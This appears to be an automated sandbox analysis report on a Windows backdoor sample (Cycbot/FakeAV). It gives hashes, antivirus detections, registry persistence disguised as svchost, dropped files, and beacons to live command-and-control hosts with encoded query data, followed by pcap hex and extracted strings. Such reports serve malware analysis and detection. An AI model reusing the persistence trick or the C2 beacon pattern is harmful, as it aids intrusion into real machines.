Analysis Date2015-01-17 13:34:35
MD59c3a3687f86657c627a19d8eadf75e8e
SHA1100bba39054293d4ecef11b3e749bd530e5fc18e

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: a5a4037e595a4507e6dac4069659ebab sha1: 9411ba1d4ed35568b0676ca4c8e8926f60c0d6a8 size: 99840
Section.rdata md5: a21cd1f313f03a515b4e182d9482c757 sha1: 3c2ca4f9084f68bf6f66dad513ffadc5e45e6067 size: 6144
Section.data md5: 30cc99db9813019b45823f800b79f30d sha1: 23ca5b96bcb546ebf89126d41b2829cfb399342d size: 15872
Section.rsrc md5: ba958d4ba5ef6675ba96517062038cbf sha1: d6439fccdc3dad3a8149acffc2f64717007ab4c7 size: 1024
Timestamp2005-09-26 05:57:29
VersionPrivateBuild: 1107
FileDescription: Windows Host Process
PEhashb6f0b6b124d23b1ecc083e1eaff9c1091883b4f6
IMPhash7e936230ae518d82d13ba944998ee2fe
AV360 Safeno_virus
AVAd-AwareGen:Heur.Conjar.2
AVAlwil (avast)Cybota [Trj]
AVArcabit (arcavir)Gen:Heur.Conjar.2
AVAuthentiumW32/Goolbot.B.gen!Eldorado
AVAvira (antivir)TR/Crypt.XPACK.Gen
AVBullGuardGen:Heur.Conjar.2
AVCA (E-Trust Ino)Win32/FakeAV.S!generic
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVTrojan.Agent-215398
AVDr. WebTrojan.Fakealert
AVEmsisoftGen:Heur.Conjar.2
AVEset (nod32)Win32/Kryptik.IHW
AVFortinetW32/FakeAV.PACK!tr
AVFrisk (f-prot)W32/Goolbot.B.gen!Eldorado
AVF-SecureGen:Heur.Conjar.2
AVGrisoft (avg)Cryptic.DRH
AVIkarusPacked.Win32.Krap
AVK7Backdoor ( 003210941 )
AVKasperskyPacked.Win32.Krap.hy
AVMalwareBytesTrojan.Agent.Gen
AVMcafeeBackDoor-EXI.gen.d
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.B
AVMicroWorld (escan)Gen:Heur.Conjar.2
AVRisingno_virus
AVSophosTroj/FakeDpr-A
AVSymantecBackdoor.Cycbot!gen2
AVTrend MicroBKDR_CYCBOT.SME
AVVirusBlokAda (vba32)no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\svchost ➝
C:\Documents and Settings\Administrator\Application Data\Microsoft\svchost.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\svchost.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\stor.cfg
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\shell.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows
Creates Mutex{A5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex{C66E79CE-8005-4ed9-A6B1-4983619CB922}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{7791C364-DE4E-4000-9E92-9CCAFDDD90DC}
Creates Mutex{C66E79CE-8935-4ed9-A6B1-4983619CB925}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSdolbyaudiodevice.com
Winsock DNSwww.google.com
Winsock DNSzoneck.com
Winsock DNSmotherboardstest.com
Winsock DNS127.0.0.1

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\shell.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows

Creates ProcessC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\shell.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\shell.exe

Network Details:

DNSzoneck.com
Type: A
208.79.234.132
DNSwww.google.com
Type: A
64.233.185.99
DNSwww.google.com
Type: A
64.233.185.103
DNSwww.google.com
Type: A
64.233.185.104
DNSwww.google.com
Type: A
64.233.185.105
DNSwww.google.com
Type: A
64.233.185.106
DNSwww.google.com
Type: A
64.233.185.147
DNSmotherboardstest.com
Type: A
204.11.56.45
DNSprotectyourpc-11.com
Type: A
DNSdolbyaudiodevice.com
Type: A
HTTP GEThttp://zoneck.com/images/im133.jpg?tq=gJ4WK%2FSUh7zEhRMw9YLRsrCSUz2rw8a3nNQLabnVsMLElls0rNa1x7KTVjnaoLe2wecnKK7Ql6TH51IortCC5IaGUUmo09LyyZJqtUn5CGFIRQ%3D%3D
User-Agent: gbot/2.3
HTTP GEThttp://www.google.com/
User-Agent:
HTTP GEThttp://www.google.com/
User-Agent:
HTTP GEThttp://zoneck.com/images/im134.jpg?tq=gK4QK%2FSUh7zEtRMw9YLRsrCiUz2rw8a3nOQLabnVsMLEpls0rNa1x7KjVjnaoLe2wdcnKK7Qh%2FWR40c%2B2NfS8smiWoNJ%2BQhhSEU%3D
User-Agent: gbot/2.3
HTTP GEThttp://motherboardstest.com/images/im135.jpg?tq=gL4SK%2FSUh7zEpRMw9JGd5dGwJk6s0824xLMjS9rWwLWyxSE6qaKxpMa1C2m51bCwxbNVK%2B%2FbxUqRSfkIYUhF
User-Agent: gbot/2.3
Flows TCP192.168.1.1:1031 ➝ 208.79.234.132:80
Flows TCP192.168.1.1:1033 ➝ 64.233.185.99:80
Flows TCP192.168.1.1:1034 ➝ 64.233.185.99:80
Flows TCP192.168.1.1:1035 ➝ 208.79.234.132:80
Flows TCP192.168.1.1:1036 ➝ 204.11.56.45:80

Raw Pcap
0x00000000 (00000)   47455420 2f696d61 6765732f 696d3133   GET /images/im13
0x00000010 (00016)   332e6a70 673f7471 3d674a34 574b2532   3.jpg?tq=gJ4WK%2
0x00000020 (00032)   46535568 377a4568 524d7739 594c5273   FSUh7zEhRMw9YLRs
0x00000030 (00048)   72435355 7a327277 3861336e 4e514c61   rCSUz2rw8a3nNQLa
0x00000040 (00064)   626e5673 4d4c456c 6c733072 4e613178   bnVsMLElls0rNa1x
0x00000050 (00080)   374b5456 6a6e616f 4c653277 65636e4b   7KTVjnaoLe2wecnK
0x00000060 (00096)   4b37516c 36544835 31496f72 74434335   K7Ql6TH51IortCC5
0x00000070 (00112)   49614755 556d6f30 394c7979 5a4a7174   IaGUUmo09LyyZJqt
0x00000080 (00128)   556e3543 47464952 51253344 25334420   Un5CGFIRQ%3D%3D 
0x00000090 (00144)   48545450 2f312e30 0d0a436f 6e6e6563   HTTP/1.0..Connec
0x000000a0 (00160)   74696f6e 3a20636c 6f73650d 0a486f73   tion: close..Hos
0x000000b0 (00176)   743a207a 6f6e6563 6b2e636f 6d0d0a41   t: zoneck.com..A
0x000000c0 (00192)   63636570 743a202a 2f2a0d0a 55736572   ccept: */*..User
0x000000d0 (00208)   2d416765 6e743a20 67626f74 2f322e33   -Agent: gbot/2.3
0x000000e0 (00224)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f204854 54502f31 2e300d0a   GET / HTTP/1.0..
0x00000010 (00016)   436f6e6e 65637469 6f6e3a20 636c6f73   Connection: clos
0x00000020 (00032)   650d0a48 6f73743a 20777777 2e676f6f   e..Host: www.goo
0x00000030 (00048)   676c652e 636f6d0d 0a416363 6570743a   gle.com..Accept:
0x00000040 (00064)   202a2f2a 0d0a0d0a 6c733072 4e613178    */*....ls0rNa1x
0x00000050 (00080)   374b5456 6a6e616f 4c653277 65636e4b   7KTVjnaoLe2wecnK
0x00000060 (00096)   4b37516c 36544835 31496f72 74434335   K7Ql6TH51IortCC5
0x00000070 (00112)   49614755 556d6f30 394c7979 5a4a7174   IaGUUmo09LyyZJqt
0x00000080 (00128)   556e3543 47464952 51253344 25334420   Un5CGFIRQ%3D%3D 
0x00000090 (00144)   48545450 2f312e30 0d0a436f 6e6e6563   HTTP/1.0..Connec
0x000000a0 (00160)   74696f6e 3a20636c 6f73650d 0a486f73   tion: close..Hos
0x000000b0 (00176)   743a207a 6f6e6563 6b2e636f 6d0d0a41   t: zoneck.com..A
0x000000c0 (00192)   63636570 743a202a 2f2a0d0a 55736572   ccept: */*..User
0x000000d0 (00208)   2d416765 6e743a20 67626f74 2f322e33   -Agent: gbot/2.3
0x000000e0 (00224)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f204854 54502f31 2e300d0a   GET / HTTP/1.0..
0x00000010 (00016)   436f6e6e 65637469 6f6e3a20 636c6f73   Connection: clos
0x00000020 (00032)   650d0a48 6f73743a 20777777 2e676f6f   e..Host: www.goo
0x00000030 (00048)   676c652e 636f6d0d 0a416363 6570743a   gle.com..Accept:
0x00000040 (00064)   202a2f2a 0d0a0d0a 6c733072 4e613178    */*....ls0rNa1x
0x00000050 (00080)   374b5456 6a6e616f 4c653277 65636e4b   7KTVjnaoLe2wecnK
0x00000060 (00096)   4b37516c 36544835 31496f72 74434335   K7Ql6TH51IortCC5
0x00000070 (00112)   49614755 556d6f30 394c7979 5a4a7174   IaGUUmo09LyyZJqt
0x00000080 (00128)   556e3543 47464952 51253344 25334420   Un5CGFIRQ%3D%3D 
0x00000090 (00144)   48545450 2f312e30 0d0a436f 6e6e6563   HTTP/1.0..Connec
0x000000a0 (00160)   74696f6e 3a20636c 6f73650d 0a486f73   tion: close..Hos
0x000000b0 (00176)   743a207a 6f6e6563 6b2e636f 6d0d0a41   t: zoneck.com..A
0x000000c0 (00192)   63636570 743a202a 2f2a0d0a 55736572   ccept: */*..User
0x000000d0 (00208)   2d416765 6e743a20 67626f74 2f322e33   -Agent: gbot/2.3
0x000000e0 (00224)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f696d61 6765732f 696d3133   GET /images/im13
0x00000010 (00016)   342e6a70 673f7471 3d674b34 514b2532   4.jpg?tq=gK4QK%2
0x00000020 (00032)   46535568 377a4574 524d7739 594c5273   FSUh7zEtRMw9YLRs
0x00000030 (00048)   72436955 7a327277 3861336e 4f514c61   rCiUz2rw8a3nOQLa
0x00000040 (00064)   626e5673 4d4c4570 6c733072 4e613178   bnVsMLEpls0rNa1x
0x00000050 (00080)   374b6a56 6a6e616f 4c653277 64636e4b   7KjVjnaoLe2wdcnK
0x00000060 (00096)   4b375168 25324657 52343063 25324232   K7Qh%2FWR40c%2B2
0x00000070 (00112)   4e665338 736d6957 6f4e4a25 32425168   NfS8smiWoNJ%2BQh
0x00000080 (00128)   68534555 25334420 48545450 2f312e30   hSEU%3D HTTP/1.0
0x00000090 (00144)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x000000a0 (00160)   6f73650d 0a486f73 743a207a 6f6e6563   ose..Host: zonec
0x000000b0 (00176)   6b2e636f 6d0d0a41 63636570 743a202a   k.com..Accept: *
0x000000c0 (00192)   2f2a0d0a 55736572 2d416765 6e743a20   /*..User-Agent: 
0x000000d0 (00208)   67626f74 2f322e33 0d0a0d0a 2f322e33   gbot/2.3..../2.3
0x000000e0 (00224)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f696d61 6765732f 696d3133   GET /images/im13
0x00000010 (00016)   352e6a70 673f7471 3d674c34 534b2532   5.jpg?tq=gL4SK%2
0x00000020 (00032)   46535568 377a4570 524d7739 4a476435   FSUh7zEpRMw9JGd5
0x00000030 (00048)   6447774a 6b367330 38323478 4c4d6a53   dGwJk6s0824xLMjS
0x00000040 (00064)   39725777 4c577978 53453671 614b7870   9rWwLWyxSE6qaKxp
0x00000050 (00080)   4d613143 326d3531 62437778 624e564b   Ma1C2m51bCwxbNVK
0x00000060 (00096)   25324225 32466278 55715253 666b4959   %2B%2FbxUqRSfkIY
0x00000070 (00112)   55684620 48545450 2f312e30 0d0a436f   UhF HTTP/1.0..Co
0x00000080 (00128)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000090 (00144)   0a486f73 743a206d 6f746865 72626f61   .Host: motherboa
0x000000a0 (00160)   72647374 6573742e 636f6d0d 0a416363   rdstest.com..Acc
0x000000b0 (00176)   6570743a 202a2f2a 0d0a5573 65722d41   ept: */*..User-A
0x000000c0 (00192)   67656e74 3a206762 6f742f32 2e330d0a   gent: gbot/2.3..
0x000000d0 (00208)   0d0a6f74 2f322e33 0d0a0d0a 2f322e33   ..ot/2.3..../2.3
0x000000e0 (00224)   0d0a0d0a                              ....


Strings

040904b0
1107
B&reak
C&ompile
&Data
FileDescription
MS Sans Serif
PrivateBuild
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
Windows Host Process
4l[e8i?
4<mr4^^
5i)GtL
-6o ]8
:6.V[kh
7Dt}.2
.7ft	~Q
7~gtw$t
7`nH{~
7NJDt.
7TOFt)
7v<<,S
7v.Yvu
89tdtk
9]*9\}
9&tet`
	9$t~q
9y^97j
AdjustWindowRectEx
=AJ.@3p
!@&AqLt 
-b4em?
B6Sl;X
B]>%G'
-.BpEO
bW8iS	
CallNextHookEx
CallWindowProcW
ccZftW
'cftj1
CheckMenuItem
c!jccs
ClientToScreen
ClosePrinter
CoCreateInstance
CoInitialize
CopyFileA
CopyFileW
CopyRect
CoUninitialize
CreateBitmap
CreateDirectoryA
CreateDirectoryW
CreateStdAccessibleObject
CreateWindowExW
@.data
DebugActiveProcessStop
DefWindowProcW
DeleteCriticalSection
DeleteDC
DeleteFileA
DeleteFileW
DeleteObject
DestroyMenu
DestroyWindow
,dHB8b
DispatchMessageW
DocumentPropertiesW
DrawTextExW
DrawTextW
d'.rhJ
Dt7-vC
dt&tdt
dt&tgt
DwN\#b
el0?SP?
EnableMenuItem
EnableWindow
EnterCriticalSection
EnumResourceLanguagesA
Escape
\et7&t
Et+h5Np
et&t-]
(Et$tc
Et'tet
ExitProcess
ExtTextOutW
FindResourceW
FlushFileBuffers
FormatMessageW
FreeLibrary
=Ft9mwU
ftetft
FtetL`
fth&t~
;Ft/IB
ftLEtl
ft&tGt
Ftx)UO
Ft~ZmgtP
(G3c[0
GDI32.dll
GetACP
GetCapture
GetClassInfoExW
GetClassInfoW
GetClassLongW
GetClassNameW
GetClientRect
GetClipBox
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
GetDeviceCaps
GetDlgCtrlID
GetDlgItem
GetFocus
GetForegroundWindow
GetKeyState
GetLastActivePopup
GetLastError
GetLocaleInfoA
GetMenu
GetMenuCheckMarkDimensions
GetMenuItemCount
GetMenuItemID
GetMenuState
GetMessagePos
GetMessageTime
GetModuleHandleA
GetModuleHandleW
GetParent
GetProcAddress
GetPropW
GetStartupInfoW
GetStockObject
GetSubMenu
GetSysColor
GetSysColorBrush
GetSystemInfo
GetSystemMetrics
GetSystemTimeAsFileTime
GetThreadLocale
GetTickCount
GetTopWindow
GetVersion
GetVersionExW
GetWindow
GetWindowLongW
GetWindowPlacement
GetWindowRect
GetWindowTextW
GlobalAddAtomW
GlobalAlloc
GlobalDeleteAtom
GlobalFindAtomW
GlobalFlags
GlobalFree
GlobalHandle
GlobalLock
GlobalReAlloc
GlobalUnlock
GrayStringW
gtDt'tFt
+gt(ft
*GtFt^;
GtMDtw
gt%tDt
gtVnEt
HeapAlloc
HeapCreate
HeapDestroy
HeapFree
HeapReAlloc
HeapSize
HFt?&t;
hhLibrh
hSleeh
H~YY+f)
i\cEz){d
i}dt%t.
ImDtm;
InitializeCriticalSection
InterlockedDecrement
InterlockedExchange
InterlockedIncrement
i nYa	w
irt[^x
IsIconic
IsWindowEnabled
/[iTVw
j2cC])
jB8c!p
j_cc^j5
^jt<W%th
KERNEL32.dll
-kft/p
~K-?kt
!;}K=sIK
k&tu}46
k\ugt^
LeaveCriticalSection
LoadBitmapW
LoadCursorW
LoadIconW
LoadLibraryA
LoadResource
LocalAlloc
LocalFree
LocalReAlloc
LockResource
l|OZWV
LresultFromObject
lstrcatW
lstrcmpW
lstrcpynW
lstrcpyW
MapWindowPoints
MessageBoxW
mIgt:>
mmDt&th
ModifyMenuW
MoveFileA
MoveFileW
MultiByteToWideChar
mxL+/b
n/@k4;6
nk?lX7
	-OAs+?o
OffsetViewportOrgEx
ole32.dll
OLEACC.dll
OpenPrinterW
OtftW=
O_/Xgt
oyjYhS
p4CZ)/u
PathAddBackslashW
PathAddExtensionW
PathAppendA
PathAppendW
PathCanonicalizeA
PathCanonicalizeW
PathFileExistsA
PathFileExistsW
PathFindExtensionA
PathFindExtensionW
PathFindFileNameA
PathFindFileNameW
PathIsDirectoryA
PathIsDirectoryEmptyA
PathIsDirectoryEmptyW
PathIsDirectoryW
PathRemoveBackslashW
PathRemoveFileSpecA
PathRemoveFileSpecW
p}dl#"
PeekMessageW
PostMessageW
PostQuitMessage
PtInRect
PtVisible
QueryPerformanceCounter
*|,?	r
RaiseException
`.rdata
ReadFile
RectVisible
RegisterClassW
RegisterWindowMessageW
ReleaseDC
RemoveDirectoryA
RemoveDirectoryW
RemovePropW
RestoreDC
rPhcU@
RtlUnwind
SaveDC
ScaleViewportExtEx
ScaleWindowExtEx
SelectObject
SendMessageW
SetBkColor
SetFileAttributesA
SetFileAttributesW
SetFilePointer
SetForegroundWindow
SetLastError
SetMapMode
SetMenuItemBitmaps
SetPropW
SetTextColor
SetViewportExtEx
SetViewportOrgEx
SetWindowExtEx
SetWindowLongW
SetWindowPos
SetWindowsHookExW
SetWindowTextW
SHLWAPI.dll
SizeofResource
StrStrA
StrStrW
SystemParametersInfoA
t</*^#
T2=NN{3
/:t\4-
t	4Ogt
t5v$tZK
t6H)}Y8
$t9	yh
TabbedTextOutW
$t>dt5
tDtDtr
tDt)i"
tdtoL't
&t{DtU
TerminateProcess
]&t	Et
tEtDtY
'tetgt$t
tetMgt
tet'tr
tetw$t3
TextOutW
t:ft}0
tFt%tl
tftTnFt<
tFtw*+dti
tft?ys
%tGtKs
tGto~H
tGttft
%tgt&tz
tGtZL4gt
!This program cannot be run in DOS mode.
T`hoL@
t:hThk
thzO&t
tj	&tL
't~kEt
tL[[-;
tLGt-"
tLOTYh
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
tL$t$t
tM5Gt8
todtN#
toIiny+
/Too*v
t$t?*>
%tT8IX
t|$tDtftm
t]%t}Et
t$t)Etdt
tThLoca
't*tHP
t?tKIvQ
t$t,NgtM8
t&t[\S
t't)%t
t$t%t@
t&t{%t
t't'tN
t-%tU90
t'tUl"
t't?W=
t}$txX
t:Ugt%t
tU'tet
tv^ft&t
tw7t&t 
twFt9/T
tW,Gt;B
tw/wh't6
%tXIDt
ty%tGt
tzet$t
tZLtZ 
==uhQh
ujk+(jEt
u;)kXv
ulyUuLM
UnhookWindowsHookEx
UnregisterClassW
USER32.dll
u=Y:ft
v9/FtK2
ValidateRect
VirtualAlloc
VirtualProtect
VirtualQuery
vi)udt9kc
(|Vj^=
W~et8'tt_
wFtnvS
wgt{'t
WideCharToMultiByte
WinHelpW
WINSPOOL.DRV
wo~'IO
WriteFile
W};%tJL
w'tndt+x1
w'tNWNb
x0L>,+@+M
xDt;hFhBq@
x-W8j~[
,+XWDt
Y\b`B0
y!'{+El
YXzk,"
?zdt7>
z't	w^